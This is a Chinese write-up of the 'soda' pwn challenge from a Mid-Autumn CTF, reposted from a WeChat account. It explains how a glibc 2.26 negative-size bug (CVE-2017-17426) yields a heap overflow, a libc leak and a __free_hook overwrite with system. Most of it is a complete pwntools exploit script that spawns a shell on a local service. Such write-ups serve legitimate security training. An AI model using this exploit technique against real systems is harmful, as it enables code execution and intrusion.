【迎中秋】公开赛writeup|Pwn-soda

  • A+
所属分类:CTF专场

题目考点:

  • cve-2017-17426

  • tcachebin attrack

解题方法:

首先程序在申请堆块的时候并没有检查size的正负,通过cve-2017-17426:glibc版本为2.26,当size为负数的时候会取tcache中的堆块,又由于当读取内容的时候会将size转化为无符号整型数据,因此可以通过这一点来造成堆溢出,然后就是堆溢出的常规利用,造成堆重叠然后tcache attrack劫持free_hook为system,free一个带有”/bin/shx00”的堆块从而获取shell。

exp见下:

#!/usr/bin/env python# -*- coding: utf-8 -*-import sysimport osfrom pwn import *context.log_level = 'debug'
binary = './soda'elf = ELF('./soda')libc = ELF("./libc.so.6")context.binary = binary
DEBUG = 0if DEBUG: p = process(binary) # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})else: host = "127.0.0.1" port = 9999 p = remote(host,port)if DEBUG == 2: host = "" port = 0 user = "" passwd = "" p = ssh(host,port,user,passwd)l64 = lambda :u64(p.recvuntil("x7f")[-6:].ljust(8,"x00"))l32 = lambda :u32(p.recvuntil("xf7")[-4:].ljust(4,"x00"))sla = lambda a,b :p.sendlineafter(str(a),str(b))sa = lambda a,b :p.sendafter(str(a),str(b))lg = lambda name,data : p.success(name + ": 0x%x" % data)se = lambda payload: p.send(payload)rl = lambda : p.recv()sl = lambda payload: p.sendline(payload)ru = lambda a :p.recvuntil(str(a))def cmd(idx): sla(">> ",str(idx))def add(size,payload): cmd(1) sla(":n",str(size)) sa(":n",payload)def free(idx): cmd(2) sla(":n",str(idx))def free1(idx): cmd(2) sla(":",str(idx))def add1(size,payload): cmd(1) sla(":",str(size)) sa(":",payload)def exp(): add(0x18,"aaaa") add(0xff,'aaaa') free(1) add(0xf0,"aaaa") free(1) add(0xe0,"aaaa") free(1) add(0xd0,'aaaa') free(1) add(0xc0,"aaaa") free(1) add(0xb0,"aaaa") free(1) free(0) add(0xff,"aaa") #chunk overflow add(str(-1),"a"*0x18+p64(0x4b1)) free(0) add(0xff,"aaa") add(0x38,p16(0x2720)) # gdb.attach(p) free(1) add(0xf0,"aaa") #leak libc_base add(0xf0,p64(0xfbad1800)+p64(0)*3+p8(0x88)) libc_base = l64()-libc.sym["_IO_2_1_stdin_"] lg("libc_base",libc_base) #tcache attrack free1(0) free1(1) free1(2) add1(0x38,p64(libc_base+libc.sym["__free_hook"])) add1(0x38,"/bin/shx00") add1(0x38,p64(libc_base+libc.sym["system"])) free1(1) p.sendline("cat flag") p.interactive()while True: p = remote(host,port) try: exp() except: p.close()


【迎中秋】公开赛writeup|Pwn-soda

点个在看你最好看




本文始发于微信公众号(胖哈勃):【迎中秋】公开赛writeup|Pwn-soda

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: